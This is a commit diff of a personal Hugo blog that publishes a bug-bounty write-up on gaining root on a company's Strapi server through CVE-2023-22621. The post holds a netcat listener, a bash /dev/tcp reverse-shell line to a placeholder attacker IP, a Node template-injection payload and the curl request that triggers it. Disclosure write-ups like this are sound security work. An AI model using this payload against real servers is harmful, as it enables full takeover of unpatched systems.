Finish Strapi RCE writeup

config.toml

@@ -2,3 +2,5 @@ baseURL = "https://tedmdelacruz.github.io"
 languageCode = "en-us"
 title = "tedmdelacruz"
 theme = "tale"
+[params]
+  subtitle = "Software developer and cybersecurity researcher based in Manila, PH"

content/posts/strapi-rce-writeup.md

@@ -2,7 +2,7 @@
 title: "Remote code execution in a billion-dollar publicly traded company"
 date: 2024-02-14T21:43:57+08:00
 author: ted
-draft: true
+draft: false
 ---
 
 There are 4 things that have to happen in order to find [CVE-2023-22621](https://nvd.nist.gov/vuln/detail/CVE-2023-22621) in the wild:
@@ -20,7 +20,7 @@ I have a server that pings me of new subdomains of this company every 5pm Manila
 Usually I don't find anything in my probes, and this one: **strapi.[redacted].com** also didn't trigger any alarms at first.
 My automations pinged me about the subdomain of this website around early December 2023, but this website caught my attention during a manual inspection of the company assets that I did around early February 2024.
 
-I couldn't believe it at first, but the _super admin_ registration for this website was open. And _somehow_, no other hacker has seen this before me:
+I couldn't believe it at first, but the _super admin_ registration for this website was open. And _somehow_, no other hacker had seen this before me:
 
 ![Admin Registration](/admin-registration.PNG)
 
@@ -30,13 +30,75 @@ Realizing this, was nothing short of exhilariting, since it's been months since
 
 Claiming the super admin of a website is nice and dandy, but like most other security researchers, I asked myself: "How can I escalate this to something even more severe?".
 
-The next step was obvious, I googled the following: "strapi cve". One CVE instantly caught my attention: **[CVE-2023-22621](https://nvd.nist.gov/vuln/detail/CVE-2023-22621)**
+The next step was obvious, I googled: "strapi cve". One particular [CVE](https://en.wikipedia.org/wiki/Common_Vulnerabilities_and_Exposures) instantly caught my attention: **[CVE-2023-22621](https://nvd.nist.gov/vuln/detail/CVE-2023-22621)** which allows for an authenicated user to execute the highly coveted **[_remote code execution_](https://en.wikipedia.org/wiki/Arbitrary_code_execution).**
 
-It ticks all of the boxes:
+The CVE ticks all of the boxes:
 - You need to have super admin access (I got that) ✔
 - The version of Strapi should be 4.5.5 and below (This website is on Strapi v3.6.0) ✔
 
 ## Remote code execution
-_WIP_
 
+The CVE allows for a remote code execution via a [reverse shell](https://wiki.ubuntu.com/ReverseShell), which requires an attacker server waiting for incoming TCP connection from a victim server.
 
+### Preparing the attacker server
+
+I spun up a small Digital Ocean droplet and using [netcat](https://en.wikipedia.org/wiki/Netcat) I had it listen to incoming TCP connections in port `1234`:
+
+```sh
+$ nc -lvnp 1234
+```
+
+- `-l` Instructs `netcat` to listen for incoming TCP connection rather than initiating a connection to a remote host.
+- `-v` Produces more verbouse output.
+- `-n` Toggles `netcat` to not do any DNS or service lookups.
+- `-p` Specifies the port to listen to.
+
+### Preparing the reverse shell payload
+
+The reverse shell payload that worked for me after initial tests in my local network was the following:
+
+```sh
+bash -c 'bash -i >& /dev/tcp/[MY_ATTACKER_IP]/1234 0>&1'
+```
+
+Combining this with the NodeJs exploit described in the CVE, we get the following payload:
+
+```js
+<%= `${ process.binding("spawn_sync").spawn({"file":"/bin/bash","args":["/bin/bash","-c","bash -c 'bash -i >& /dev/tcp/[MY_ATTACKER_IP]/1234 0>&1'"],"stdio":[{"readable":1,"writable":1,"type":"pipe"},{"readable":1,"writable":1,"type":"pipe"/*<>%=*/}]}).output }` %>
+```
+
+Now, [CVE-2023-22621](https://nvd.nist.gov/vuln/detail/CVE-2023-22621) exploits a email template bypass in Strapi. Simply put, it runs when an attempt to send an email is sent. The initial configuration of Strapi allows admins to update the email confirmation template. This is where the payload is saved:
+
+![Strapi RCE payload](/strapi-rce-payload.PNG)
+
+This exploit runs when a confirmation email is sent, so an API call that registers a new user to Strapi in order to execute the reverse shell is needed. This is a basic cURL command for that purpose:
+
+```sh
+$ curl -vvv -X POST -H 'Content-Type: application/json' -d '{"email":"[email protected]", "username":"rcetrigger1", "password": "Test1234!"}' https://strapi.[redacted].com/auth/local/register/
+```
+
+Upon execution of the cURL command, Strapi attempts to validate the email template. The exploit then takes advantage of a template validation bypass and unintentionally runs the reverse shell payload via `node`. The reverse shell then creates a TCP connection to my attacker server, which spawns a `bash` session.
+
+Now the attacker machine has logged in to the server as `root`, **giving me total control of the server**:
+
+```sh
+root@[redacted]:/home/[redacted]/project/strapi# ls
+ls
+api    config      favicon.ico   package.json  README.md
+build  extensions  node_modules  public        yarn.lock
+```
+
+In order to prove the RCE, I left an inconspicuous text file in the server. So I left one at `/root/tedminfosec.txt`:
+
+```sh
+root@[redacted]:/home/[redacted]/project/strapi# cat /root/tedminfosec.txt
+hello from [email protected]
+```
+
+## Reporting the bug
+
+Once that's done, I took my time to write a detailed vulnerability report and submitted it to the bug bounty program. It was triaged as **Critical**:
+
+![Strapi RCE triage](/strapi-rce-triage.jpg)
+
+Now that's how I compromised a server of a company worth more than a billion dollars.

public/categories/index.html

@@ -35,7 +35,6 @@ <h1 class="nav-title">tedmdelacruz</h1>
 
 
 </ul>
-				<p><small>Software developer and cybersecurity researcher based in Manila, PH</small></p>
 			</div>
 		</nav>
 
@@ -58,7 +57,7 @@ <h1>Categories</h1>
         		<footer>
 
 			<span>
-			&copy; <time datetime="2024-02-15 13:27:12.8814679 &#43;0800 &#43;08 m=&#43;0.229318001">2024</time> . Made with <a href='https://gohugo.io'>Hugo</a> using the <a href='https://github.com/EmielH/tale-hugo/'>Tale</a> theme.
+			&copy; <time datetime="2024-02-19 12:27:44.8931588 &#43;0800 &#43;08 m=&#43;0.238765501">2024</time> . Made with <a href='https://gohugo.io'>Hugo</a> using the <a href='https://github.com/EmielH/tale-hugo/'>Tale</a> theme.
 			</span>
 		</footer>
 

public/index.html

@@ -37,7 +37,6 @@ <h1 class="nav-title">tedmdelacruz</h1>
 
 
 </ul>
-				<p><small>Software developer and cybersecurity researcher based in Manila, PH</small></p>
 			</div>
 		</nav>
 
@@ -53,6 +52,20 @@ <h1 class="nav-title">tedmdelacruz</h1>
 
 	<div class="catalogue">
 
+			<a href="https://tedmdelacruz.github.io/posts/strapi-rce-writeup/" class="catalogue-item">
+    <div>
+        <time datetime="2024-02-14 21:43:57 &#43;0800 &#43;08" class="catalogue-time">February 14, 2024</time>
+        <h2 class="catalogue-title">Remote code execution in a billion-dollar publicly traded company</h2>
+        <div class="catalogue-line"></div>
+
+        <p>
+            There are 4 things that have to happen in order to find CVE-2023-22621 in the wild:
+ You need to find a website that is powered by Strapi. The super admin for this website, somehow, has not been claimed yet. The version of Strapi should be at least version 4.5.5 and below. No other hacker somehow saw any of the three aformentioned scenarios first.  The stars have aligned in my favor and I found exactly that in one of the websites of a billion dollar company listed in the New York Stock Exchange.
+        </p>
+    </div>
+</a>
+
+
 			<a href="https://tedmdelacruz.github.io/posts/hello-world/" class="catalogue-item">
     <div>
         <time datetime="2022-05-12 13:06:39 &#43;0800 &#43;08" class="catalogue-time">May 12, 2022</time>
@@ -80,7 +93,7 @@ <h2 class="catalogue-title">Hello World</h2>
         		<footer>
 
 			<span>
-			&copy; <time datetime="2024-02-15 13:27:12.8815464 &#43;0800 &#43;08 m=&#43;0.229396501">2024</time> . Made with <a href='https://gohugo.io'>Hugo</a> using the <a href='https://github.com/EmielH/tale-hugo/'>Tale</a> theme.
+			&copy; <time datetime="2024-02-19 12:27:44.9528028 &#43;0800 &#43;08 m=&#43;0.298409601">2024</time> . Made with <a href='https://gohugo.io'>Hugo</a> using the <a href='https://github.com/EmielH/tale-hugo/'>Tale</a> theme.
 			</span>
 		</footer>
 

public/index.xml

@@ -11,6 +11,16 @@
 	<atom:link href="https://tedmdelacruz.github.io/index.xml" rel="self" type="application/rss+xml" />
 
 
+    <item>
+      <title>Remote code execution in a billion-dollar publicly traded company</title>
+      <link>https://tedmdelacruz.github.io/posts/strapi-rce-writeup/</link>
+      <pubDate>Wed, 14 Feb 2024 21:43:57 +0800</pubDate>
+
+      <guid>https://tedmdelacruz.github.io/posts/strapi-rce-writeup/</guid>
+      <description>There are 4 things that have to happen in order to find CVE-2023-22621 in the wild:
+ You need to find a website that is powered by Strapi. The super admin for this website, somehow, has not been claimed yet. The version of Strapi should be at least version 4.5.5 and below. No other hacker somehow saw any of the three aformentioned scenarios first.  The stars have aligned in my favor and I found exactly that in one of the websites of a billion dollar company listed in the New York Stock Exchange.</description>
+    </item>
+
     <item>
       <title>Hello World</title>
       <link>https://tedmdelacruz.github.io/posts/hello-world/</link>

public/posts/hello-world/index.html

@@ -35,7 +35,6 @@ <h2 class="nav-title">tedmdelacruz</h2>
 
 
 </ul>
-				<p><small>Software developer and cybersecurity researcher based in Manila, PH</small></p>
 			</div>
 		</nav>
 
@@ -71,6 +70,7 @@ <h1 class="post-title">Hello World</h1>
 	</div>
 
 	<div class="pagination">
+		<a href="/posts/strapi-rce-writeup/" class="right arrow">&#8594;</a>
 
 		<a href="#" class="top">Top</a>
 	</div>
@@ -80,7 +80,7 @@ <h1 class="post-title">Hello World</h1>
         		<footer>
 
 			<span>
-			&copy; <time datetime="2024-02-15 13:27:12.8806572 &#43;0800 &#43;08 m=&#43;0.228507301">2024</time> . Made with <a href='https://gohugo.io'>Hugo</a> using the <a href='https://github.com/EmielH/tale-hugo/'>Tale</a> theme.
+			&copy; <time datetime="2024-02-19 12:27:44.8922883 &#43;0800 &#43;08 m=&#43;0.237895101">2024</time> . Made with <a href='https://gohugo.io'>Hugo</a> using the <a href='https://github.com/EmielH/tale-hugo/'>Tale</a> theme.
 			</span>
 		</footer>
 

public/posts/index.html

@@ -35,7 +35,6 @@ <h1 class="nav-title">tedmdelacruz</h1>
 
 
 </ul>
-				<p><small>Software developer and cybersecurity researcher based in Manila, PH</small></p>
 			</div>
 		</nav>
 
@@ -48,6 +47,20 @@ <h1 class="nav-title">tedmdelacruz</h1>
 <main>
 	<div class="catalogue">
 
+			<a href="https://tedmdelacruz.github.io/posts/strapi-rce-writeup/" class="catalogue-item">
+    <div>
+        <time datetime="2024-02-14 21:43:57 &#43;0800 &#43;08" class="catalogue-time">February 14, 2024</time>
+        <h2 class="catalogue-title">Remote code execution in a billion-dollar publicly traded company</h2>
+        <div class="catalogue-line"></div>
+
+        <p>
+            There are 4 things that have to happen in order to find CVE-2023-22621 in the wild:
+ You need to find a website that is powered by Strapi. The super admin for this website, somehow, has not been claimed yet. The version of Strapi should be at least version 4.5.5 and below. No other hacker somehow saw any of the three aformentioned scenarios first.  The stars have aligned in my favor and I found exactly that in one of the websites of a billion dollar company listed in the New York Stock Exchange.
+        </p>
+    </div>
+</a>
+
+
 			<a href="https://tedmdelacruz.github.io/posts/hello-world/" class="catalogue-item">
     <div>
         <time datetime="2022-05-12 13:06:39 &#43;0800 &#43;08" class="catalogue-time">May 12, 2022</time>
@@ -75,7 +88,7 @@ <h2 class="catalogue-title">Hello World</h2>
         		<footer>
 
 			<span>
-			&copy; <time datetime="2024-02-15 13:27:12.8815899 &#43;0800 &#43;08 m=&#43;0.229439901">2024</time> . Made with <a href='https://gohugo.io'>Hugo</a> using the <a href='https://github.com/EmielH/tale-hugo/'>Tale</a> theme.
+			&copy; <time datetime="2024-02-19 12:27:44.9528692 &#43;0800 &#43;08 m=&#43;0.298476101">2024</time> . Made with <a href='https://gohugo.io'>Hugo</a> using the <a href='https://github.com/EmielH/tale-hugo/'>Tale</a> theme.
 			</span>
 		</footer>
 

public/posts/index.xml

@@ -6,11 +6,21 @@
     <description>Recent content in Posts on tedmdelacruz</description>
     <generator>Hugo -- gohugo.io</generator>
     <language>en-us</language>
-    <lastBuildDate>Thu, 12 May 2022 13:06:39 +0800</lastBuildDate>
+    <lastBuildDate>Wed, 14 Feb 2024 21:43:57 +0800</lastBuildDate>
 
 	<atom:link href="https://tedmdelacruz.github.io/posts/index.xml" rel="self" type="application/rss+xml" />
 
 
+    <item>
+      <title>Remote code execution in a billion-dollar publicly traded company</title>
+      <link>https://tedmdelacruz.github.io/posts/strapi-rce-writeup/</link>
+      <pubDate>Wed, 14 Feb 2024 21:43:57 +0800</pubDate>
+
+      <guid>https://tedmdelacruz.github.io/posts/strapi-rce-writeup/</guid>
+      <description>There are 4 things that have to happen in order to find CVE-2023-22621 in the wild:
+ You need to find a website that is powered by Strapi. The super admin for this website, somehow, has not been claimed yet. The version of Strapi should be at least version 4.5.5 and below. No other hacker somehow saw any of the three aformentioned scenarios first.  The stars have aligned in my favor and I found exactly that in one of the websites of a billion dollar company listed in the New York Stock Exchange.</description>
+    </item>
+
     <item>
       <title>Hello World</title>
       <link>https://tedmdelacruz.github.io/posts/hello-world/</link>